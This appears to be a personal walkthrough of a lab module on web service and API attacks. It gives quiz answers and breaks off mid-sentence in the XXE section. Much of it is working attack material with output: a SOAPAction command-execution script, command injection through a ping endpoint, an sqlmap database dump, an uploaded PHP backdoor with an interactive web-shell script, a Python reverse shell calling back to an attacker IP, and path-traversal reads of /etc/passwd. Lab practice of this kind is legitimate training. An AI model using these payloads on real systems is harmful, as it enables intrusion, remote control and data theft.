WEB SERVICE & API ATTACKS

WEB SERVICES DESCRIPTION LANGUAGE (WSDL)

If you should think of the operation object in WSDL as a programming concept, which of the following is closer in terms of the provided functionality? Answer options (without quotation marks): "Data Structure", "Method", "Class"

Method
 * In WSDL, an operation defines an action that a web service can perform, specifying input and output messages. This is similar to a method (or function) in programming, which takes input parameters, processes them, and returns output.

SOAPACTION SPOOFING

Exploit the SOAPAction spoofing vulnerability and submit the architecture of the web server as your answer. Answer options (without quotation marks): "x86_64", "x86"

#conduct recon...
root@htb:~$ sudo nmap -sV -sC -T4 10.129.202.133 -p-
 PORT     STATE SERVICE VERSION
 3000/tcp open  http    Node.js Express framework
 |_http-title: Site doesn't have a title.
 3001/tcp open  http    PHP cli server 5.5 or later
 |_http-title: Login
 3002/tcp open  http    Node.js Express framework
 |_http-title: Site doesn't have a title.
 3003/tcp open  http    PHP cli server 5.5 or later (PHP 7.4.3)
 |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
 
root@htb:~$ BROWSER > {targetSite:port}
 ...the target may not have a visible webpage, but simply a service that doesn't have visible open access

#step 1: perform directory fuzzing to determine if the wsdl file is exposed
root@oco:~$ dirb http://{targetSite:port}
 -----------------
 DIRB v2.22    
 By The Dark Raver
 -----------------

 START_TIME: Fri Mar 25 11:53:09 2022
 URL_BASE: http://{targetSite:port}/
 WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

 -----------------

 GENERATED WORDS: 4612                                                          

 ---- Scanning URL: http://{targetSite:port}/ ----
 + http://{targetSite:port}/wsdl (CODE:200|SIZE:0)                            
                                                                               
 -----------------
 END_TIME: Fri Mar 25 11:53:24 2022
 DOWNLOADED: 4612 - FOUND: 1
 
 * ALT: root@oco:~$ find /usr/share/seclists/ -iname directory-list-2* -type f 2>/dev/null
         /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
         /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
         /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
        root@oco:~$ cp /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt .

root@oco:~$ ffuf -w directory-list-2.3-small.txt:FUZZ -u http://10.129.139.27/FUZZ -t 100 -ic
 
#step 2: read the contents
root@oco:~$ curl http://{targetSite:port}/wsdl 
 ...no output. this may mean that a parameter is required to access it
 
#step 3: perform parameter fuzzing 
root@oco:~$ find / -iname burp-parameter* 2>/dev/null
 /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
root@oco:~$ cp /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt .
root@oco:~$ ffuf -w burp-parameter-names.txt -u 'http://{targetSite:port}:3002/wsdl?FUZZ' -fs 0 -mc 200
 ...
 :: Progress: [40/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Error
 :: Progress: [537/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Erro
 wsdl [Status: 200, Size: 4461, Words: 967, Lines: 186]
 :: Progress: [982/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Erro:: 
 Progress: [1153/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Err::
 Progress: [1780/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Err:: 
 Progress: [2461/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Err:: 
 Progress: [2588/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Err:: 
 Progress: [2588/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::

 * the -fs 0 filters out empty responses (size = 0)
 * the -mc 200 matches HTTP 200 responses.
 
#step 4: try to read the contents again
root@oco:~$ curl http://{targetSite:port}/wsdl?wsdl 
 ...
 <wsdl:definitions targetNamespace="http://tempuri.org/"
  ...
 <wsdl:types>
  ...
 <!-- Login Messages -->
  <wsdl:message name="LoginSoapIn">
  ...
 <!-- ExecuteCommand Messages -->
  <wsdl:message name="ExecuteCommandSoapIn">
  ...
 <wsdl:portType name="HacktheBoxSoapPort">
  <!-- Login Operaion | PORT -->
  ...
 <!-- ExecuteCommand Operation | PORT -->
  <wsdl:operation name="ExecuteCommand">
  ...
 <wsdl:binding name="HacktheboxServiceSoapBinding" type="tns:HacktheBoxSoapPort">
  <soap:binding transport="http://schemas.xmlsoap.org/soap/http"/>
  <!-- SOAP Login Action -->
  <wsdl:operation name="Login">
  ...
  <!-- SOAP ExecuteCommand Action -->
   <wsdl:operation name="ExecuteCommand">
   <soap:operation soapAction="ExecuteCommand" style="document"/>
  <wsdl:service name="HacktheboxService">
   ...
 
 * WSDL files can be found in many forms, such as /example.wsdl, ?wsdl, /example.disco, ?disco etc. DISCO is a Microsoft technology for publishing and discovering Web Services.
    - https://docs.microsoft.com/en-us/archive/msdn-magazine/2002/february/xml-files-publishing-and-discovering-web-services-with-disco-and-uddi
      
WSDL Elements
 * Definition: this is the root element of the WSDL file; it specifies the web service name, declares namespaces, and defines all service elements.
 * Data types: these are the data types used in the exchanged messages.
 * Messages: this defines the web service's input and output operations, specifying exchanged messages as documents or method arguments.
 * Operation: this defines the available SOAP actions alongside the encoding of each message.
 * Port Type: this defines the web service, its operations, and exchanged messages by grouping input and output messages into operations. In WSDL 2.0, the interface defines operations, while types handle message definitions.
 * Binding: this links operations to a port type, specifying message formats and access details for web services. In WSDL 2.0, it also defines interfaces.
    ... this is the area that OCO will manipulate, but this is not the only option
 * Service: this specifies the web service name and location, allowing clients to identify and call it.

root@oco:~$ nano soapActionAutomated.py
 import requests

  while True:
   cmd = input("$ ")
   payload = f'<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"  xmlns:tns="http://tempuri.org/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/"><soap:Body><LoginRequest xmlns="http://tempuri.org/"><cmd>{cmd}</cmd></LoginRequest></soap:Body></soap:Envelope>'
   print(requests.post("http://{targetSite:port}/wsdl", data=payload, headers={"SOAPAction":'"ExecuteCommand"'}).content)
   
root@oco:~$ python3 soapActionAutomated.py
 $ id
  b'<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"  xmlns:tns="http://tempuri.org/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/"><soap:Body><LoginResponse xmlns="http://tempuri.org/"><success>true</success><result>uid=0(root) gid=0(root) groups=0(root)\n</result></LoginResponse></soap:Body></soap:Envelope>' 
 $ arch
  b'<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"  xmlns:tns="http://tempuri.org/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/"><soap:Body><LoginResponse xmlns="http://tempuri.org/"><success>true</success><result>x86_64\n</result></LoginResponse></soap:Body></soap:Envelope>'
 $ uname -a
  b'<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"  xmlns:tns="http://tempuri.org/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/"><soap:Body><LoginResponse xmlns="http://tempuri.org/"><success>true</success><result>Linux nix01-websvc 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux\n</result></LoginResponse></soap:Body></soap:Envelope>'
 $

COMMAND INJECTION

Exploit the command injection vulnerability of the target to execute an "id" command. Submit the privileges under which the server is running as your answer. Answer options (without quotation marks): "user", "www-data", "root"

#conduct recon...
root@htb:~$ sudo nmap -sV -sC -T4 10.129.202.133 -p-
 PORT     STATE SERVICE VERSION
 3000/tcp open  http    Node.js Express framework
 |_http-title: Site doesn't have a title.
 3001/tcp open  http    PHP cli server 5.5 or later
 |_http-title: Login
 3002/tcp open  http    Node.js Express framework
 |_http-title: Site doesn't have a title.
 3003/tcp open  http    PHP cli server 5.5 or later (PHP 7.4.3)
 |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
 
#identify pages or directories either via web crawling or fuzzing

#web crawling method
#step 1: configure the browser to intercept traffic
root@oco:~$ BROWSER > Settings
 Search: Proxy
 
root@oco:~$ BROWSER > Network Settings > Settings
 Configure Proxy Access to the Internet
  Manual Proxy Configuration: enabled
  HTTP Proxy: 127.0.0.1
  Port: 8080 {default Burp listening port}
  Also Use this Proxy for HTTPS: enabled
  
 * it is advisable to also check the option of "Also use this proxy for FTP and HTTPS" IOT have all requests go through BurpSuite
 
step 2: #disable Burp Intercept
root@oco:~$ burpsuite &
BURP > Proxy > Intercept
 Intercept is on: disabled

 * Burp's intercept is enabled by default
 
step 3: passively crawl the target site
root@oco:~$ BROWSER > {targetSite:port}

 * can also simply refresh the page if already on the target site
 
step 4: identify pertinent pages in burpsuite
BURP > Target > Site Map > ...

#recursive page fuzzing method via gobuster or ffuf
root@oco:~$ cp /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt .

#modify the wordlist and add the reverse shell file name
root@oco:~$ directory-list-2.3-small.txt
 php-reverse-shell
 
 * note: the server might change the filename as it get uploaded as a security measure

root@oco:~$ gobuster dir --url http://{targetIP}/ --wordlist directory-list-2.3-small.txt -x php -r -t 50
 /.php                 (Status: 403) [Size: 277]
 /themes               (Status: 403) [Size: 277]
 /uploads              (Status: 403) [Size: 277]
 /css                  (Status: 403) [Size: 277]
 /index.php            (Status: 200) [Size: 10932]
 /images               (Status: 403) [Size: 277]
 /js                   (Status: 403) [Size: 277]
 /fonts                (Status: 403) [Size: 277]
 
 * the "dir" option refers directory enumeration mode
 * the --url specifies the target IP/URL
 * the --wordlist specifies the wordlist to use
 * the -x appends file extensions to each word in the wordlist
 * can specify multiple extensions by separating them with commas
    - php,html,txt
 * the -r refers to "recursive fuzzing" (if a directory is found, it continues brute-forcing inside it)
 * the -t will use multi threading to make the scan faster (default is 0)
    - this could trigger rate-limiting or bans

#exploitation
root@oco:~$ curl http://<TARGET IP>:3003/ping-server.php/system/ls
 index.php
 ping-server.php
 
 * since the call_user_func_array() allows calling of any function,
   adversaries can issue arbitrary cmds via exec(), system() shell_exec() and 
   the backtick operator
   
root@oco:~$ curl http://10.129.117.228:3003/ping-server.php/system/id
 uid=0(root) gid=0(root) groups=0(root)

To execute commands featuring arguments via http://:3003/ping-server.php/system/{cmd} you may have to use ______. Answer options (without quotation marks): "Encryption", "Hashing", "URL Encoding"

URL Encoding
 * to ensure the command executes properly, URL encoding is used to convert special characters into a format that can be safely transmitted in a URL.

INFORMATION DISCLOSURE (WITH A TWIST OF SQLI)

What is the username of the third user (id=3)?

root@oco:~$ sudo nmap -sV -sC -T4 10.129.202.133 -p-
 PORT     STATE SERVICE VERSION
 3000/tcp open  http    Node.js Express framework
 |_http-title: Site doesn't have a title.
 3001/tcp open  http    PHP cli server 5.5 or later
 |_http-title: Login
 3002/tcp open  http    Node.js Express framework
 |_http-title: Site doesn't have a title.
 3003/tcp open  http    PHP cli server 5.5 or later (PHP 7.4.3)
 |_http-title: Site doesn't have a title (text/html; charset=UTF-8).

STEP 2: IDENTIFY THE VULNERABLE PARAMETER
root@oco:~$ find / -iname burp-param* 2>/dev/null
 /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
root@oco:~$ cp /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt . 

root@oco:~$ ffuf -w burp-parameter-names.txt -u 'http://<TARGET IP>:3003/?FUZZ=test_value'
 ...
 :: Progress: [40/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errorpassword                [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [40/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errorurl                     [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [41/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errorc                       [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [42/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errorid                      [Status: 200, Size: 38, Words: 7, Lines: 1]
 :: Progress: [43/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Erroremail                   [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [44/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errortype                    [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [45/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errorusername                [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [46/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errorq                       [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [47/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errortitle                   [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [48/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errordata                    [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [49/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errordescription             [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [50/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errorfile                    [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [51/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errormode                    [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [52/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors                       [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [53/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errororder                   [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [54/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errorcode                    [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [55/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errorlang                    [Status: 200, Size: 19, Words: 4, Lines: 1]

 * notice a similar response size in every request. This is because supplying any 
   parameter will return the same text, not an error like 404

#filter out any responses having a size of 19
root@oco:~$ ffuf -w burp-parameter-names.txt -u 'http://<TARGET IP>:3003/?FUZZ=test_value' -fs 19
 ...
 id                      [Status: 200, Size: 38, Words: 7, Lines: 1, Duration: 9ms]

 * the id parameter has... [Status: 200, Size: 38, Words: 7, Lines: 1]
   which means its a valid parameter

#provide a sample test
root@oco:~$ curl http://<TARGET IP>:3003/?id=1
 [{"id":"1","username":"admin","position":"1"}]
 
root@oco:~$ curl http://10.129.202.133:3003/?id=3
 [{"id":"3","username":"WebServices","position":"3"}]

Identify the username of the user that has a position of 736373 through SQLi. Submit it as your answer.

root@oco:~$ sudo nmap -sV -sC -T4 10.129.202.133 -p-
 PORT     STATE SERVICE VERSION
 3000/tcp open  http    Node.js Express framework
 |_http-title: Site doesn't have a title.
 3001/tcp open  http    PHP cli server 5.5 or later
 |_http-title: Login
 3002/tcp open  http    Node.js Express framework
 |_http-title: Site doesn't have a title.
 3003/tcp open  http    PHP cli server 5.5 or later (PHP 7.4.3)
 |_http-title: Site doesn't have a title (text/html; charset=UTF-8).

STEP 2: IDENTIFY THE VULNERABLE PARAMETER
root@oco:~$ find / -iname burp-param* 2>/dev/null
 /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
root@oco:~$ cp /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt . 

root@oco:~$ ffuf -w burp-parameter-names.txt -u 'http://<TARGET IP>:3003/?FUZZ=test_value'
 ...
 :: Progress: [40/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errorpassword                [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [40/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errorurl                     [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [41/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errorc                       [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [42/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errorid                      [Status: 200, Size: 38, Words: 7, Lines: 1]
 :: Progress: [43/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Erroremail                   [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [44/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errortype                    [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [45/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errorusername                [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [46/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errorq                       [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [47/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errortitle                   [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [48/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errordata                    [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [49/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errordescription             [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [50/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errorfile                    [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [51/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errormode                    [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [52/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors                       [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [53/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errororder                   [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [54/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errorcode                    [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [55/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errorlang                    [Status: 200, Size: 19, Words: 4, Lines: 1]

 * notice a similar response size in every request. This is because supplying any 
   parameter will return the same text, not an error like 404

#filter out any responses having a size of 19
root@oco:~$ ffuf -w burp-parameter-names.txt -u 'http://<TARGET IP>:3003/?FUZZ=test_value' -fs 19
 ...
 id                      [Status: 200, Size: 38, Words: 7, Lines: 1, Duration: 9ms]

 * the id parameter has... [Status: 200, Size: 38, Words: 7, Lines: 1]
   which means its a valid parameter

#provide a sample test
root@oco:~$ curl http://<TARGET IP>:3003/?id=1
 [{"id":"1","username":"admin","position":"1"}]
 
root@oco:~$ curl http://10.129.202.133:3003/?id=3
 [{"id":"3","username":"WebServices","position":"3"}]

root@oco:~$ sqlmap -u 'http://10.129.202.133:3003/?id=1' --dump
 ...
 [23:12:14] [INFO] the back-end DBMS is MySQL
 web application technology: PHP 7.4.3
 back-end DBMS: MySQL >= 5.0.12
 [23:12:14] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
 [23:12:14] [INFO] fetching current database
 [23:12:14] [INFO] fetching tables for database: 'htb'
 [23:12:14] [INFO] fetching columns for table 'users' in database 'htb'
 [23:12:14] [INFO] fetching entries for table 'users' in database 'htb'
 Database: htb
 Table: users
 [4 entries]
 +---------+--------------------------------+------------+
 | id      | username                       | position   |
 +---------+--------------------------------+------------+
 | 1       | admin                          | 1          |
 | 2       | HTB-User-John                  | 2          |
 | 3       | WebServices                    | 3          |
 | 8374932 | HTB{THE_FL4G_FOR_SQLI_IS_H3RE} | 736373     |
 +---------+--------------------------------+------------+

 [23:12:14] [INFO] table 'htb.users' dumped to CSV file '/home/htb-ac-53539/.local/share/sqlmap/output/10.129.202.133/dump/htb/users.csv'
 [23:12:14] [INFO] fetched data logged to text files under '/home/htb-ac-53539/.local/share/sqlmap/output/10.129.202.133'

 [*] ending @ 23:12:14 /2025-03-23/

ARBITRARY FILE UPLOAD

Achieve remote code execution and submit the server's hostname as your answer.

root@oco:~$ sudo nmap -sV -sC -T4 10.129.202.133 -p-
 PORT     STATE SERVICE VERSION
 3000/tcp open  http    Node.js Express framework
 |_http-title: Site doesn't have a title.
 3001/tcp open  http    PHP cli server 5.5 or later
 |_http-title: Login
 3002/tcp open  http    Node.js Express framework
 |_http-title: Site doesn't have a title.
 3003/tcp open  http    PHP cli server 5.5 or later (PHP 7.4.3)

root@oco:~$ sudo nmap --script=vuln -T4 10.129.202.133 -p 3000,3001,3002,3003
 PORT     STATE SERVICE
 3000/tcp open  ppp
 3001/tcp open  nessus
 3002/tcp open  exlm-agent
 3003/tcp open  cgms

root@oco:~$ BROWSER > http://10.129.202.133:3001/
 
 * anonymous file upload in the open

root@oco:~$ nano backdoor.php
 <?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd); die; }?>

root@oco:~$ BROWSER > http://10.129.202.133:3001
 Anonymous upload: backdoor.php
  Your file is uploaded to /uploads/backdoor.php
  
root@oco:~$ nano webShell.py
 import argparse, time, requests, os
 parser = argparse.ArgumentParser(description="Interactive Web Shell for PoCs") 
 parser.add_argument("-t", "--target", help="Specify the target host E.g. http://<TARGET IP>:3001/uploads/backdoor.php", required=True) 
 parser.add_argument("-p", "--payload", help="Specify the reverse shell payload E.g. a python3 reverse shell. IP and Port required in the payload")
 parser.add_argument("-o", "--option", help="Interactive Web Shell with loop usage: python3 web_shell.py -t http://<TARGET IP>:3001/uploads/backdoor.php -o yes")
 args = parser.parse_args() 
 if args.target == None and args.payload == None: 
   parser.print_help() 
 elif args.target and args.payload: 
   print(requests.get(args.target+"/?cmd="+args.payload).text) 
 if args.target and args.option == "yes": 
   os.system("clear") # clear the screen (linux)
     while True: 
       try: 
         cmd = input("$ ") 
         print(requests.get(args.target+"/?cmd="+cmd).text) 
         time.sleep(0.3) # waits 0.3 seconds during each request
       except requests.exceptions.InvalidSchema:
         print("Invalid URL Schema: http:// or https://")
       except requests.exceptions.ConnectionError:
         print("URL is invalid")
         
 * # imports four modules argparse (used for system arguments), time (used for time), requests (used for HTTP/HTTPs Requests), os (used for operating system commands)
 * partse = argparse.ArgumentParser(): # generates a variable called parser and uses argparse to create a description
 * # specifies flags such as -t for a target with a help and required option being true
 * args... # defines args as a variable holding the values of the above arguments so we can do args.option for example.
 * # checks if args.target (the url of the target) and the payload is blank if so it'll show the help menu
 * # shows help menu
 * # elif (if they both have values do some action)
 * ## sends the request with a GET method with the targets URL appends the /?cmd= param and the payload and then prints out the value using .text because we're already sending it within the print() function
 * # if the target option is set and args.option is set to yes (for a full interactive shell)
 * # starts a while loop (never ending loop)
 * # defines a cmd variable for an input() function which our user will enter
 * # same as above except with our input() function value

#interactive method 
root@oco:~$ nc -nlvp 8088

root@oco:~$ python3 web_shell.py -t http://<TARGET IP>:3001/uploads/backdoor.php -o yes

$ python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.45",8088));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

root@oco:~$ nc...
# uname -a
 Linux nix01-websvc 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

LOCAL FILE INCLUSION (LFI)

Through the LFI vulnerability identify an existing user on the server whose name starts with "ub". Answer format: ub****

root@htb:~$ sudo nmap -sV -sC -T4 10.129.202.133 -p-
 PORT     STATE SERVICE VERSION
 3000/tcp open  http    Node.js Express framework
 |_http-title: Site doesn't have a title.
 3001/tcp open  http    PHP cli server 5.5 or later
 |_http-title: Login
 3002/tcp open  http    Node.js Express framework
 |_http-title: Site doesn't have a title.
 3003/tcp open  http    PHP cli server 5.5 or later (PHP 7.4.3)
 
root@htb:~$ sudo nmap --script=vuln -T4 10.129.202.133 -p 3000-3003
 PORT     STATE SERVICE
 3000/tcp open  ppp
 3001/tcp open  nessus
 3002/tcp open  exlm-agent
 3003/tcp open  cgms

root@htb:~$ find / -iname directory-list*
 /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
 
root@oco:~$ cp /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt .
root@oco:~$ ffuf -w directory-list-2.3-small.txt:FUZZ -u http://{targetSite.tld}:{port}/FUZZ -t 100 -ic
 api                     [Status: 200, Size: 15, Words: 1, Lines: 1, Duration: 14ms]
 API                     [Status: 200, Size: 15, Words: 1, Lines: 1, Duration: 9ms]

 * -w specifies the wordlist
 * -u specifies the url
 * -t increases the number of threads
 * -ic removes commented lines from the file
    - ignore wordlist comments (default: false)
    
root@htb:~$ curl http://10.129.202.133:3000/api
 {"status":"UP"}
 
 * try this on Kibana
 
#perform API endpoint fuzzing common-api-endpoints-mazen160.txt list
root@htb:~$ find / -iname common-api* 2>/dev/null
 /usr/share/seclists/Discovery/Web-Content/common-api-endpoints-mazen160.txt

root@htb:~$ cp /usr/share/seclists/Discovery/Web-Content/common-api-endpoints-mazen160.txt .
root@htb:~$ ffuf -w common-api-endpoints-mazen160.txt -u 'http://{targetSite:port}/api/FUZZ' -t 100 -ic
 download                [Status: 200, Size: 71, Words: 5, Lines: 1, Duration: 27ms]

root@htb:~$ curl http://10.129.202.133:3000/api/download
 {"success":false,"error":"Input the filename via /download/<filename>"}

#test whether the target is vulnerable to LFI
root@htb:~$ curl "http://{targetSite:port}/api/download/..%2f..%2f..%2f..%2fetc%2fhosts"
 127.0.0.1 localhost
 127.0.1.1 nix01-websvc

 # The following lines are desirable for IPv6 capable hosts
 ::1     ip6-localhost ip6-loopback
 fe00::0 ip6-localnet
 ff00::0 ip6-mcastprefix
 ff02::1 ip6-allnodes
 ff02::2 ip6-allrouters
 
root@htb:~$ curl "http://10.129.202.133:3000/api/download/..%2f..%2f..%2f..%2fetc%2fpasswd"
 root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
 bin:x:2:2:bin:/bin:/usr/sbin/nologin
 sys:x:3:3:sys:/dev:/usr/sbin/nologin
 sync:x:4:65534:sync:/bin:/bin/sync
 games:x:5:60:games:/usr/games:/usr/sbin/nologin
 man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
 lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
 mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
 news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
 uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
 proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
 www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
 backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
 list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
 irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
 nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
 systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
 systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
 systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
 messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
 syslog:x:104:110::/home/syslog:/usr/sbin/nologin
 _apt:x:105:65534::/nonexistent:/usr/sbin/nologin
 tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
 uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
 tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
 landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
 pollinate:x:110:1::/var/cache/pollinate:/bin/false
 sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
 systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
 lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
 usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
 mysql:x:113:118:MySQL Server,,,:/nonexistent:/bin/false
 ubuntu:x:1000:1000::/home/ubuntu:/bin/bash

CROSS-SITE SCRIPTING

If we URL-encoded our payload twice, would it still work? Answer format: Yes, No

No
 * double encoding the payload is a technique often used in bypassing security 
   filters that only check for single-encoded payloads. however, it only works 
   if the application decodes user input twice before rendering it in the 
   response.
    - also, if the application only decodes once or properly sanitizes the input then
      it will NOT work!

SERVER-SIDE REQUEST FORGERY (SSRF)

Can you leverage the SSRF vulnerability to identify port 3002 listening locally on the web server? Answer format: Yes, No

Yes
 * if the web server allows requests to localhost:3002, an attacker could use 
   SSRF to send a request to http://127.0.0.1:3002 and analyze the response to 
   determine if the port is open and a service is running.

REGULAR EXPRESSION DENIAL OF SERVICE (ReDoS)

There are more than one payload lengths to exploit/trigger the ReDoS vulnerability. Answer format: Yes, No

Yes
 * different payload lengths can trigger a ReDoS vulnerability depending on 
   the regex pattern. The attack effectiveness varies based on the input 
   structure and how the regex engine processes it

XML ENTERNAL ENTITY (XXE) INJECTION

What URI scheme should you specify inside an entity to retrieve the content of an internal file? Answer options (without quotation marks): "http", "https", "data", "file"

file
 * the file URI scheme (file://) is used to access local files on a system. 
   In an XXE attack, specifying file:///etc/passwd (for example) could attempt 
